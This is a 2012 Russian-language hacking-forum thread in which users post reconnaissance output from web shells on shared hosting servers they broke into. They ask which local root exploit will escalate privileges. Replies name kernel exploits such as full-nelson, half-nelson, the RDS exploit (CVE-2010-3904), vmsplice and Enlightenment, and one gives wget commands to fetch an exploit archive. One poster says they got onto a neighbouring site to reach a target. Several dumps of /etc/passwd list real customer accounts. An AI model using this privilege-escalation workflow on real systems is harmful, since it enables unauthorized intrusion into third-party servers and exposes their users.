ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.10.2012, 07:46
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме: 11466
Репутация:
3
|
|
Можно чем то пробить?
Код:
================================================uname -a================================================
Linux site.com 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
================================================mount================================================
================================================df -h================================================
================================================ls -la /boot================================================
================================================cat /proc/version================================================
================================================pwd================================================
/webcorp1/www/corpusers/p/h/site.com/infinitive/rte/images
================================================id================================================
================================================whoami================================================
================================================cat /etc/passwd================================================
================================================cat /etc/issue================================================
================================================cat /etc/issue.net================================================
================================================cat /proc/sys/vm/mmap_min_addr================================================
================================================cat /etc/crontab================================================
================================================ls -la /etc/cron.d================================================
================================================ls -la /etc/cron.hourly================================================
================================================ls -la /etc/cron.monthly================================================
================================================ls -la /etc/cron.weekly================================================
================================================ls -la /etc================================================
================================================ls -la --full-time /lib================================================
================================================ls -la --full-time /lib64================================================
================================================cat /proc/cpuinfo================================================
================================================ls -la /libexec================================================
================================================php -v================================================
================================================perl -v================================================
This is perl, v5.10.1 (*) built for x86_64-linux-thread-multi
Copyright 1987-2009, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
================================================ls -la /usr/sbin/wicd================================================
================================================env================================================
================================================ps -aux================================================
================================================SUID FILES:================================================
================================================All writeable folders:================================================
================================================All writeable files:================================================
|
|
|

24.10.2012, 10:15
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от WendM
Можно чем то пробить?
Код:
================================================uname -a================================================
Linux site.com 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
================================================mount================================================
================================================df -h================================================
================================================ls -la /boot================================================
================================================cat /proc/version================================================
================================================pwd================================================
/webcorp1/www/corpusers/p/h/site.com/infinitive/rte/images
================================================id================================================
================================================whoami================================================
================================================cat /etc/passwd================================================
================================================cat /etc/issue================================================
================================================cat /etc/issue.net================================================
================================================cat /proc/sys/vm/mmap_min_addr================================================
================================================cat /etc/crontab================================================
================================================ls -la /etc/cron.d================================================
================================================ls -la /etc/cron.hourly================================================
================================================ls -la /etc/cron.monthly================================================
================================================ls -la /etc/cron.weekly================================================
================================================ls -la /etc================================================
================================================ls -la --full-time /lib================================================
================================================ls -la --full-time /lib64================================================
================================================cat /proc/cpuinfo================================================
================================================ls -la /libexec================================================
================================================php -v================================================
================================================perl -v================================================
This is perl, v5.10.1 (*) built for x86_64-linux-thread-multi
Copyright 1987-2009, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
================================================ls -la /usr/sbin/wicd================================================
================================================env================================================
================================================ps -aux================================================
================================================SUID FILES:================================================
================================================All writeable folders:================================================
================================================All writeable files:================================================
Это же виртуалка.
|
|
|

24.10.2012, 12:43
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме: 11466
Репутация:
3
|
|
Сообщение от Expl0ited
Это же виртуалка.
Ага, и на ней хостится 200-300 сайтов?
Сижу там под apache. Могу ходить там везде, смотреть исходники сайтов) Не виртуалка там
|
|
|

28.10.2012, 09:43
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Подскажите что нибудь под:
Код:
Server software: Apache
Disabled PHP Functions: none
cURL support: enabled
Supported databases: MySql (5.1.62), MSSQL
Readable /etc/passwd: yes [view]
Readable /etc/shadow: no
OS version: Linux version 2.6.30-gentoo-r8-U (root@xen-host) (gcc version 3.4.6 (Gentoo Hardened 3.4.6-r2 p1.5, ssp-3.4.6-1.0, pie-8.7.10)) #1 SMP Tue Nov 24 11:56:28 MSK 2009
Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc
Downloaders: wget, curl
Пробывал half-nelson в ответ получил:
Код:
half-nelson.c: In function 'get_kstack':
half-nelson.c:212:79: error: 'MAP_32BIT' undeclared (first use in this function)
half-nelson.c:212:79: note: each undeclared identifier is reported only once for each function it appears in
и т.д.
Пробывал другой способ со статьи:
Код:
sh-4.2$ mkdir /tmp/exploit
mkdir /tmp/exploit
sh-4.2$ ln /bin/ping /tmp/exploit/target
ln /bin/ping /tmp/exploit/target
sh-4.2$ exec 3 socket:[76306682]
Пробывал full-nelson:
Код:
gcc full-nelson.c -o full-nelson
full-nelson.c:1:4: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'all'
full-nelson.c:3:2: warning: missing terminating ' character
full-nelson.c:3:1: error: missing terminating ' character
full-nelson.c:4:62: warning: missing terminating ' character
full-nelson.c:4:1: error: missing terminating ' character
In file included from /usr/include/stdio.h:75:0,
from full-nelson.c:73:
/usr/include/libio.h:334:3: error: expected specifier-qualifier-list before 'size_t'
/usr/include/libio.h:366:62: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/libio.h:375:6: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/libio.h:497:19: error: expected '=', ',', ';', 'asm' or '__attribute__' before '_IO_sgetn'
In file included from full-nelson.c:73:0:
/usr/include/stdio.h:316:35: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:322:47: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:334:20: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:341:10: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:383:44: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:385:6: error: format string argument not a string type
/usr/include/stdio.h:387:45: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:659:11: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:662:9: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:672:8: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdio.h:702:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'fread'
/usr/include/stdio.h:708:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'fwrite'
/usr/include/stdio.h:730:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'fread_unlocked'
/usr/include/stdio.h:732:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'fwrite_unlocked'
In file included from /usr/include/sys/uio.h:29:0,
from /usr/include/sys/socket.h:28,
from full-nelson.c:74:
/usr/include/bits/uio.h:47:5: error: expected specifier-qualifier-list before 'size_t'
In file included from /usr/include/sys/socket.h:40:0,
from full-nelson.c:74:
/usr/include/bits/socket.h:257:5: error: expected specifier-qualifier-list before 'size_t'
/usr/include/bits/socket.h:280:5: error: expected specifier-qualifier-list before 'size_t'
In file included from full-nelson.c:74:0:
/usr/include/sys/socket.h:141:53: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/socket.h:148:45: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/socket.h:155:55: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/socket.h:166:60: error: expected declaration specifiers or '...' before 'size_t'
In file included from full-nelson.c:77:0:
/usr/include/string.h:45:40: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:49:58: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:58:18: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:65:42: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:68:60: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:95:50: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:132:41: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:140:9: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:146:61: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:153:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strxfrm'
In file included from full-nelson.c:77:0:
/usr/include/string.h:168:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strxfrm_l'
/usr/include/string.h:183:47: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:284:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strcspn'
/usr/include/string.h:288:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strspn'
/usr/include/string.h:399:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strlen'
/usr/include/string.h:406:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'strnlen'
/usr/include/string.h:427:12: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:451:33: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:455:55: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:459:31: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:462:58: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:540:65: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:577:36: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/string.h:580:41: error: expected declaration specifiers or '...' before 'size_t'
In file included from /usr/include/sched.h:43:0,
from full-nelson.c:79:
/usr/include/bits/sched.h:205:37: error: expected ')' before '__setsize'
/usr/include/bits/sched.h:207:44: error: expected ')' before '__count'
In file included from full-nelson.c:80:0:
/usr/include/stdlib.h:140:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before '__ctype_get_mb_cur_max'
/usr/include/stdlib.h:337:4: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:367:4: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:369:6: error: nonnull argument with out-of-range operand number (argument 1, operand 4)
/usr/include/stdlib.h:471:29: error: expected ')' before '__size'
/usr/include/stdlib.h:473:29: error: expected ')' before '__nmemb'
/usr/include/stdlib.h:485:36: error: expected declaration specifiers or '...' before 'size_t'
In file included from /usr/include/stdlib.h:497:0,
from full-nelson.c:80:
/usr/include/alloca.h:33:29: error: expected ')' before '__size'
In file included from full-nelson.c:80:0:
/usr/include/stdlib.h:503:29: error: expected ')' before '__size'
/usr/include/stdlib.h:508:45: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:508:65: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:756:9: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:756:25: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:757:6: error: nonnull argument with out-of-range operand number (argument 1, operand 5)
/usr/include/stdlib.h:761:34: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:761:50: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:762:6: error: nonnull argument with out-of-range operand number (argument 1, operand 4)
/usr/include/stdlib.h:840:6: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:843:6: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:847:31: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:851:31: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:860:38: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:864:36: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/stdlib.h:871:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'mbstowcs'
/usr/include/stdlib.h:874:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'wcstombs'
In file included from /usr/include/signal.h:356:0,
from full-nelson.c:81:
/usr/include/bits/sigstack.h:54:5: error: expected specifier-qualifier-list before 'size_t'
In file included from full-nelson.c:83:0:
/usr/include/sys/mman.h:58:34: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:77:34: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:82:36: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:90:33: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:95:35: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:99:41: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:104:41: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:107:43: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/sys/mman.h:124:36: error: expected declaration specifiers or '...' before 'size_t'
In file included from full-nelson.c:84:0:
/usr/include/unistd.h:357:45: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:363:54: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:373:46: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:381:55: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:508:35: error: expected declaration specifiers or '...' before 'size_t'
In file included from full-nelson.c:84:0:
/usr/include/unistd.h:620:15: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'confstr'
/usr/include/unistd.h:793:46: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:829:29: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:840:31: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:876:38: error: expected declaration specifiers or '...' before 'size_t'
In file included from full-nelson.c:84:0:
/usr/include/unistd.h:898:39: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:905:47: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:916:41: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:918:49: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:936:57: error: expected declaration specifiers or '...' before 'size_t'
/usr/include/unistd.h:937:6: error: expected declaration specifiers or '...' before 'size_t'
full-nelson.c: In function 'get_kernel_sym':
full-nelson.c:128:33: error: too many arguments to function 'strncmp'
/usr/include/string.h:146:12: note: declared here
full-nelson.c:153:9: error: too many arguments to function 'strncmp'
/usr/include/string.h:146:12: note: declared here
full-nelson.c: In function 'trigger':
full-nelson.c:200:9: error: too many arguments to function 'memset'
/usr/include/string.h:65:14: note: declared here
full-nelson.c:201:9: error: too many arguments to function 'strncpy'
/usr/include/string.h:131:14: note: declared here
full-nelson.c: In function 'main':
full-nelson.c:249:25: warning: incompatible implicit declaration of built-in function 'malloc'
full-nelson.c:262:24: error: too many arguments to function 'mmap'
/usr/include/sys/mman.h:58:14: note: declared here
full-nelson.c:269:9: error: too many arguments to function 'memcpy'
/usr/include/string.h:44:14: note: declared here
full-nelson.c:273:15: error: 'CLONE_VM' undeclared (first use in this function)
full-nelson.c:273:15: note: each undeclared identifier is reported only once for each function it appears in
full-nelson.c:273:26: error: 'CLONE_CHILD_CLEARTID' undeclared (first use in this function)
Пробывал CVE-2010-3904:
Код:
sh-4.2$ gcc linux-rds-exploit.c -o linux-rds-exploit
gcc linux-rds-exploit.c -o linux-rds-exploit
sh-4.2$ ./linux-rds-exploit
./linux-rds-exploit[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Could not open socket.
Надеюсь описал более менее подробно
|
|
|

31.10.2012, 22:42
|
|
Новичок
Регистрация: 29.10.2012
Сообщений: 8
Провел на форуме: 2588
Репутация:
0
|
|
Чем пробить ?????????
linux 2.6.18-92.1.6.el5.centos.plus #1 SMP Thu Jun 26 EDT 2008 i686
|
|
|

01.11.2012, 08:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от salomander
Чем пробить ?????????
linux 2.6.18-92.1.6.el5.centos.plus #1 SMP Thu Jun 26 EDT 2008 i686
Присмотрись тут
От себя - я бы попробовал Enligment
и vmsplice Local Root Exploit
|
|
|

01.11.2012, 11:12
|
|
Новичок
Регистрация: 29.10.2012
Сообщений: 8
Провел на форуме: 2588
Репутация:
0
|
|
Сообщение от salomander
Чем пробить ?????????
linux 2.6.18-92.1.6.el5.centos.plus #1 SMP Thu Jun 26 EDT 2008 i686
BigBear спасибо проверю
кто что еще дельного посоветует, может кто имел дело с такой системой?
|
|
|

06.11.2012, 00:12
|
|
Участник форума
Регистрация: 06.02.2011
Сообщений: 111
Провел на форуме: 42267
Репутация:
5
|
|
#1 SMP PREEMPT Fri Aug 21 09:07:39 CEST 2009 x86_64
|
|
|

07.11.2012, 19:59
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме: 97332
Репутация:
38
|
|
2 lansia
Enlightenment (до лета 2010)
Сообщение от None
$ wget http://grsecurity.net/~spender/exploits/enlightenment.tgz
$ tar xvfz enlightenment.tgz
Прошу помощи у товарищей комрадов.
Ситуация: есть сервер, нужно получить доступ к сайту. На сам сайт не залится, но получилось залится на соседа.
Права только к папочке юзера. / home/ sosed. Выручайте.
$ uname -a 2>&1
Сообщение от None
Linux srv15.***.com 2.6.18-408.8.2.el5.lve0.8.61.3 #1 SMP Wed Jul 11 06:49:35 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux
$ mount 2>&1
Сообщение от None
/dev/sda3 on / type ext3 (rw,noatime,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
$ df -h 2>&1
Сообщение от None
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 523G 476G 21G 96% /
/dev/sda1 99M 36M 58M 39% /boot
tmpfs 7.9G 20K 7.9G 1% /dev/shm
/usr/tmpDSK 1.6G 1.1G 425M 71% /tmp
$ ls -la /boot 2>&1
Сообщение от None
total 30787
drwxr-xr-x 4 root root 3072 Sep 18 09:22 .
drwxr-xr-x 29 root root 4096 Sep 18 22:09 ..
-rw-r--r-- 1 root root 162 Oct 20 2011 .vmlinuz-2.6.18-274.7.1.el5.hmac
-rw-r--r-- 1 root root 1269803 Oct 20 2011 System.map-2.6.18-274.7.1.el5
-rw-r--r-- 1 root root 1321658 Mar 2 2012 System.map-2.6.18-374.18.1.el5.lve0.8.57
-rw-r--r-- 1 root root 1319220 Oct 3 2011 System.map-2.6.18-374.3.1.el5.lve0.8.44
-rw-r--r-- 1 root root 1328188 Jul 11 10:52 System.map-2.6.18-408.8.2.el5.lve0.8.61.3
-rw-r--r-- 1 root root 1327407 Mar 14 2012 System.map-2.6.18-408.el5.lve0.8.58
-rw-r--r-- 1 root root 67613 Oct 20 2011 config-2.6.18-274.7.1.el5
-rw-r--r-- 1 root root 68386 Mar 2 2012 config-2.6.18-374.18.1.el5.lve0.8.57
-rw-r--r-- 1 root root 68385 Oct 3 2011 config-2.6.18-374.3.1.el5.lve0.8.44
-rw-r--r-- 1 root root 68319 Jul 11 10:52 config-2.6.18-408.8.2.el5.lve0.8.61.3
-rw-r--r-- 1 root root 68313 Mar 14 2012 config-2.6.18-408.el5.lve0.8.58
drwxr-xr-x 2 root root 1024 Sep 18 09:22 grub
-rw------- 1 root root 2719474 Nov 11 2011 initrd-2.6.18-274.7.1.el5.img
-rw------- 1 root root 2722520 Mar 21 2012 initrd-2.6.18-374.18.1.el5.lve0.8.57.img
-rw------- 1 root root 2718667 Nov 28 2011 initrd-2.6.18-374.3.1.el5.lve0.8.44.img
-rw------- 1 root root 2729647 Sep 18 09:22 initrd-2.6.18-408.8.2.el5.lve0.8.61.3.img
-rw------- 1 root root 2729453 Apr 21 2012 initrd-2.6.18-408.el5.lve0.8.58.img
drwx------ 2 root root 12288 Nov 11 2011 lost+found
-rw-r--r-- 1 root root 116197 Oct 20 2011 symvers-2.6.18-274.7.1.el5.gz
-rw-r--r-- 1 root root 123848 Mar 2 2012 symvers-2.6.18-374.18.1.el5.lve0.8.57.gz
-rw-r--r-- 1 root root 123606 Oct 3 2011 symvers-2.6.18-374.3.1.el5.lve0.8.44.gz
-rw-r--r-- 1 root root 124230 Jul 11 10:53 symvers-2.6.18-408.8.2.el5.lve0.8.61.3.gz
-rw-r--r-- 1 root root 124217 Mar 14 2012 symvers-2.6.18-408.el5.lve0.8.58.gz
-rw-r--r-- 1 root root 2107004 Oct 20 2011 vmlinuz-2.6.18-274.7.1.el5
-rw-r--r-- 1 root root 2019676 Mar 2 2012 vmlinuz-2.6.18-374.18.1.el5.lve0.8.57
-rw-r--r-- 1 root root 2017212 Oct 3 2011 vmlinuz-2.6.18-374.3.1.el5.lve0.8.44
-rw-r--r-- 1 root root 2027036 Jul 11 10:52 vmlinuz-2.6.18-408.8.2.el5.lve0.8.61.3
-rw-r--r-- 1 root root 2025948 Mar 14 2012 vmlinuz-2.6.18-408.el5.lve0.8.58
$ cat /proc/version 2>&1
Сообщение от None
Linux version 2.6.18-408.8.2.el5.lve0.8.61.3 (mockbuild@koji.cloudlinux.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-52)) #1 SMP Wed Jul 11 06:49:35 EDT 2012
$ cat /etc/passwd 2>&1
Сообщение от None
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0
perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32
ortmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74
rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:101:103:MySQL server:/var/lib/mysql:/bin/bash
cpaneleximfilter:x:32007:32009::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
rvadmin:x:500:500::/home/rvadmin:/usr/local/cpanel/bin/noshell
securervskin:x:32008:32010::/home/rvadmin:/sbin/nologin
securervsite:x:32009:32011::/home/securervsite:/sbin/nologin
lsadm:x:102:32012::/:/sbin/nologin
chosting:x:502:501::/home/chosting:/usr/local/cpanel/bin/jailshell
bodymind:x:503:502::/home/bodymind:/usr/local/cpanel/bin/jailshell
butiksil:x:504:503::/home/butiksil:/usr/local/cpanel/bin/noshell
ctestdk:x:505:504::/home/ctestdk:/usr/local/cpanel/bin/jailshell
lilleing:x:507:505::/home/lilleing:/usr/local/cpanel/bin/noshell
smashbro:x:511:508::/home/smashbro:/usr/local/cpanel/bin/noshell
allsain1:x:513:510::/home/allsain1:/usr/local/cpanel/bin/noshell
izabella:x:515:512::/home/izabella:/usr/local/cpanel/bin/noshell
xlogicor:x:516:513::/home/xlogicor:/usr/local/cpanel/bin/noshell
clamav:x:506:507::/usr/local/clamav:/bin/false
webnapol:x:520:517::/home/webnapol:/usr/local/cpanel/bin/noshell
webhoste:x:527:524::/home/webhoste:/usr/local/cpanel/bin/noshell
stevehol:x:530:527::/home/stevehol:/usr/local/cpanel/bin/noshell
downthed:x:531:528::/home/downthed:/usr/local/cpanel/bin/noshell
forethic:x:532:529::/home/forethic:/usr/local/cpanel/bin/noshell
bradfiel:x:533:530::/home/bradfiel:/usr/local/cpanel/bin/noshell
maiuebsa:x:534:531::/home/maiuebsa:/usr/local/cpanel/bin/noshell
marcogug:x:535:532::/home/marcogug:/usr/local/cpanel/bin/noshell
welingel:x:536:533::/home/welingel:/usr/local/cpanel/bin/noshell
videopro:x:537:534::/home/videopro:/usr/local/cpanel/bin/noshell
quintada:x:538:535::/home/quintada:/usr/local/cpanel/bin/noshell
a1:x:539:536::/home/a1:/usr/local/cpanel/bin/noshell
shronlin:x:540:537::/home/shronlin:/usr/local/cpanel/bin/noshell
jonatho1:x:541:538::/home/jonatho1:/usr/local/cpanel/bin/noshell
vivereil:x:542:539::/home/vivereil:/usr/local/cpanel/bin/noshell
luxurycu:x:543:540::/home/luxurycu:/usr/local/cpanel/bin/noshell
crudismo:x:544:541::/home/crudismo:/usr/local/cpanel/bin/noshell
assobili:x:545:542::/home/assobili:/usr/local/cpanel/bin/noshell
smartpro:x:547:544::/home/smartpro:/usr/local/cpanel/bin/noshell
casinozi:x:548:545::/home/casinozi:/usr/local/cpanel/bin/noshell
taylortw:x:549:546::/home/taylortw:/usr/local/cpanel/bin/noshell
hstdigit:x:551:548::/home/hstdigit:/usr/local/cpanel/bin/noshell
cell:x:554:551::/home/cell:/usr/local/cpanel/bin/noshell
cmacher:x:555:552::/home/cmacher:/usr/local/cpanel/bin/noshell
craig07:x:556:553::/home/craig07:/usr/local/cpanel/bin/noshell
devws:x:557:554::/home/devws:/usr/local/cpanel/bin/noshell
efot:x:558:555::/home/efot:/usr/local/cpanel/bin/noshell
evok:x:560:557::/home/evok:/usr/local/cpanel/bin/noshell
floritas:x:561:558::/home/floritas:/usr/local/cpanel/bin/noshell
globale:x:562:559::/home/globale:/usr/local/cpanel/bin/noshell
greena:x:563:560::/home/greena:/usr/local/cpanel/bin/noshell
mobjb:x:565:562::/home/mobjb:/usr/local/cpanel/bin/noshell
mrooms:x:566:563::/home/mrooms:/usr/local/cpanel/bin/noshell
photos:x:567:564::/home/photos:/usr/local/cpanel/bin/noshell
prltd08:x:568:565::/home/prltd08:/usr/local/cpanel/bin/noshell
srooms:x:570:567::/home/srooms:/bin/false
thewharf:x:571:568::/home/thewharf:/usr/local/cpanel/bin/noshell
uklascom:x:572:569::/home/uklascom:/usr/local/cpanel/bin/noshell
ukpd:x:573:570::/home/ukpd:/bin/false
[normal users]
$ cat /etc/issue 2>&1
Сообщение от None
CloudLinux Server release 5.8
Kernel \r on an \m
$ cat /etc/crontab 2>&1
Сообщение от None
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
|
|
|

07.11.2012, 20:06
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме: 97332
Репутация:
38
|
|
омфг
$ls -la /etc 2>&1
Код:
total 51780
drwxr-xr-x 98 root root 12288 Nov 7 14:01 .
drwxr-xr-x 29 root root 4096 Sep 18 22:09 ..
-rw-r----- 1 root mail 0 Nov 7 05:55 .mailips
-rw------- 1 root root 0 Nov 11 2011 .pwd.lock
-rw-r--r-- 1 root root 0 Nov 14 2011 .whostmgrft
-rw-r--r-- 1 root root 30 Oct 2 14:03 CloudLinux-release
-rw-r--r-- 1 root root 2518 Mar 21 2012 DIR_COLORS
-rw-r--r-- 1 root root 2420 Mar 21 2012 DIR_COLORS.xterm
drwxr-xr-x 4 root root 4096 Nov 11 2011 NetworkManager
drwxr-xr-x 6 root root 4096 Aug 10 05:53 X11
